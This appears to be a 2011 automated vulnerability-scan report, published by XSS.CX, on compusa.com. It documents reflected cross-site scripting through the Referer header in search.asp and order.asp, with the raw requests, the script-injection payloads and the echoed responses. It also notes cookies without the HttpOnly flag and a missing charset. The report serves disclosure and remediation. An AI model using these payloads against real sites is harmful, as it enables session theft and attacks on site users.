XSS, DORK, Cross Site Scripting, CWE-79, CAPEC-86, compusa.com

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Sun Apr 17 09:51:29 CDT 2011.


XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog
Loading

1. Cross-site scripting (reflected)

1.1. http://www.compusa.com/applications/SearchTools/search.asp [Referer HTTP header]

1.2. http://www.compusa.com/cgi-bin/order.asp [Referer HTTP header]

2. Cookie without HttpOnly flag set

2.1. http://www.compusa.com/applications/SearchTools/search.asp

2.2. http://www.compusa.com/cgi-bin/icart.asp

2.3. http://www.compusa.com/cgi-bin/order.asp

3. HTML does not specify charset



1. Cross-site scripting (reflected)  next
There are 2 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.compusa.com/applications/SearchTools/search.asp [Referer HTTP header]  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.compusa.com
Path:   /applications/SearchTools/search.asp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload f0c0c--><script>alert(1)</script>ab07c28887 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /applications/SearchTools/search.asp HTTP/1.1
Host: www.compusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=f0c0c--><script>alert(1)</script>ab07c28887

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA04A
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
Date: Sun, 17 Apr 2011 14:21:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: pop%5Fcheck=active; expires=Mon, 18-Apr-2011 04:00:00 GMT; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Sidenav=B&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=71; path=/
Set-Cookie: SRVR=WEBX23%2D04A; path=/
Set-Cookie: Cart=rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ESYX+Venture+VX9+Series+Custom+Desktop+PC%3E%3EEdpNo%3D5688178%5ED%3E%3EGarmin+Nuvi+1490T+5%22+GPS+w%2FTraffic%2FBT+%2D+RB%3E%3EEdpNo%3D5589658%5ED%3E%3EFantom+2TB+G%2DForce+External+Hard+Drive%3E%3EEdpNo%3D5384378&Landing=http%3A%2F%2Fwww%2Ecompusa%2Ecom%2Fapplications%2FSearchTools%2Ffailedsearch%2Easp%3Fkeywords%3D&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&Referer=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3Df0c0c%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eab07c28887&PHRoutine=10; path=/
Set-Cookie: SRCCODE=COMPGOOSFS; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SessionId=1127875020110417102130173193214243; expires=Mon, 16-Apr-2012 04:00:00 GMT; path=/
Content-Length: 112869


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="description" content="CompUSA.com is your complete online headquarters for computer products at
...[SNIP]...
<!--Cart(Referer) :http://www.google.com/search?hl=en&q=f0c0c--><script>alert(1)</script>ab07c28887-->
...[SNIP]...

1.2. http://www.compusa.com/cgi-bin/order.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.compusa.com
Path:   /cgi-bin/order.asp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 24a87--><script>alert(1)</script>ec22dac0bbf was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /cgi-bin/order.asp HTTP/1.1
Host: www.compusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=24a87--><script>alert(1)</script>ec22dac0bbf

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
Date: Sun, 17 Apr 2011 14:21:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: pop%5Fcheck=active; expires=Mon, 18-Apr-2011 04:00:00 GMT; path=/
Set-Cookie: Warranty=POPPED; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Sidenav=A&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=63; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SessionId=3626439220110417102129173193214243; expires=Mon, 16-Apr-2012 04:00:00 GMT; path=/
Set-Cookie: Cart=Landing=http%3A%2F%2Fwww%2Ecompusa%2Ecom%2Fapplications%2Fsearchtools%2Fitem%5Fupsell%2Easp%3FEdpNo%3D%26msg%3D&Referer=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3D24a87%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eec22dac0bbf&PHRoutine=10; path=/
Set-Cookie: SRCCODE=COMPGOOSFS; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: SRVR=WEBX22%2D01A; path=/
Content-Length: 79761


<!--v1-->
<!--Domain :: compusa.com-->
<!--imageHost :: http://images.highspeedbackbone.net-->
<!--BaseURL :: www.compusa.com-->
<!--ContinueShoppingURL :: /applications/searchtools/item-details
...[SNIP]...
<!--Cart(Referer) :http://www.google.com/search?hl=en&q=24a87--><script>alert(1)</script>ec22dac0bbf-->
...[SNIP]...

2. Cookie without HttpOnly flag set  previous  next
There are 3 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



2.1. http://www.compusa.com/applications/SearchTools/search.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.compusa.com
Path:   /applications/SearchTools/search.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /applications/SearchTools/search.asp HTTP/1.1
Host: www.compusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
Location: failedsearch.asp?keywords=
Content-Length: 147
Content-Type: text/html
Cache-Control: private
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 14:21:26 GMT
Connection: close
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=90; path=/
Set-Cookie: SRVR=WEBX22%2D01A; path=/
Set-Cookie: Cart=Landing=http%3A%2F%2Fwww%2Ecompusa%2Ecom%2Fapplications%2FSearchTools%2Fsearch%2Easp&Referer=; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SessionId=5032977920110417102126173193214243; expires=Mon, 16-Apr-2012 04:00:00 GMT; path=/
Set-Cookie: SRCCODE=COMPUSA; expires=Tue, 17-May-2011 04:00:00 GMT; path=/

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="failedsearch.asp?keywords=">here</a>.</body>

2.2. http://www.compusa.com/cgi-bin/icart.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.compusa.com
Path:   /cgi-bin/icart.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi-bin/icart.asp?p=upsell HTTP/1.1
Host: www.compusa.com
Proxy-Connection: keep-alive
Referer: http://www.compusa.com/applications/searchtools/item_upsell.asp?EdpNo=&msg=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pop%5Fcheck=active; Warranty=POPPED; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Sidenav=B&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=61; beta=Y; SessionId=3547262620110417105004173193214243; Cart=Landing=http%3A%2F%2Fwww%2Ecompusa%2Ecom%2Fapplications%2Fsearchtools%2Fitem%5Fupsell%2Easp%3FEdpNo%3D%26msg%3D&Referer=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3D24a87%2D%2D%3E%3Cscript%3Ealert%28%22IDIOT%22%29%3C%2Fscript%3Eec22dac0bbf&PHRoutine=10; SRCCODE=COMPGOOSFS; SRVR=WEBX23%2D03B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA02B
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 14:50:10 GMT
Cache-Control: no-cache
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 14:50:11 GMT
Connection: close
Set-Cookie: SRVR=WEBX22%2D02B; path=/
Set-Cookie: SRCCODE=COMPGOOSFS; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: Cart=PHRoutine=10&Referer=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3D24a87%2D%2D%3E%3Cscript%3Ealert%28%22IDIOT%22%29%3C%2Fscript%3Eec22dac0bbf&Landing=http%3A%2F%2Fwww%2Ecompusa%2Ecom%2Fapplications%2Fsearchtools%2Fitem%5Fupsell%2Easp%3FEdpNo%3D%26msg%3D; path=/
Set-Cookie: beta=Y; path=/
Content-Length: 1501


<HTML>
<HEAD>
<TITLE>Your CompUSA.com Shopping Cart</TITLE>
<META NAME="Generator" CONTENT="EditPlus">
<META NAME="Author" CONTENT="">
<META NAME="Keywords" CONTENT="">
<META NAME="Description
...[SNIP]...

2.3. http://www.compusa.com/cgi-bin/order.asp  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.compusa.com
Path:   /cgi-bin/order.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi-bin/order.asp HTTP/1.1
Host: www.compusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-SV: MIA02A
X-Powered-By: ASP.NET
Location: /applications/searchtools/item_upsell.asp?EdpNo=&msg=
Content-Length: 178
Content-Type: text/html
Cache-Control: private
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 14:21:26 GMT
Connection: close
Set-Cookie: CartId=0; path=/
Set-Cookie: CartSave=CartId=0&Cart=1; expires=Mon, 18-Apr-2011 04:00:00 GMT; path=/
Set-Cookie: SRCCODE=COMPUSA; expires=Tue, 17-May-2011 04:00:00 GMT; path=/

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/applications/searchtools/item_upsell.asp?EdpNo=&amp;msg=">here</a>.</body>

3. HTML does not specify charset  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.compusa.com
Path:   /cgi-bin/icart.asp

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

Request

GET /cgi-bin/icart.asp?p=upsell HTTP/1.1
Host: www.compusa.com
Proxy-Connection: keep-alive
Referer: http://www.compusa.com/applications/searchtools/item_upsell.asp?EdpNo=&msg=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pop%5Fcheck=active; Warranty=POPPED; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Sidenav=B&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=61; beta=Y; SessionId=3547262620110417105004173193214243; Cart=Landing=http%3A%2F%2Fwww%2Ecompusa%2Ecom%2Fapplications%2Fsearchtools%2Fitem%5Fupsell%2Easp%3FEdpNo%3D%26msg%3D&Referer=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3D24a87%2D%2D%3E%3Cscript%3Ealert%28%22IDIOT%22%29%3C%2Fscript%3Eec22dac0bbf&PHRoutine=10; SRCCODE=COMPGOOSFS; SRVR=WEBX23%2D03B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA02B
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 14:50:10 GMT
Cache-Control: no-cache
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 14:50:11 GMT
Connection: close
Set-Cookie: SRVR=WEBX22%2D02B; path=/
Set-Cookie: SRCCODE=COMPGOOSFS; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: Cart=PHRoutine=10&Referer=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3D24a87%2D%2D%3E%3Cscript%3Ealert%28%22IDIOT%22%29%3C%2Fscript%3Eec22dac0bbf&Landing=http%3A%2F%2Fwww%2Ecompusa%2Ecom%2Fapplications%2Fsearchtools%2Fitem%5Fupsell%2Easp%3FEdpNo%3D%26msg%3D; path=/
Set-Cookie: beta=Y; path=/
Content-Length: 1501


<HTML>
<HEAD>
<TITLE>Your CompUSA.com Shopping Cart</TITLE>
<META NAME="Generator" CONTENT="EditPlus">
<META NAME="Author" CONTENT="">
<META NAME="Keywords" CONTENT="">
<META NAME="Description
...[SNIP]...

Report generated by XSS.CX at Sun Apr 17 09:51:29 CDT 2011.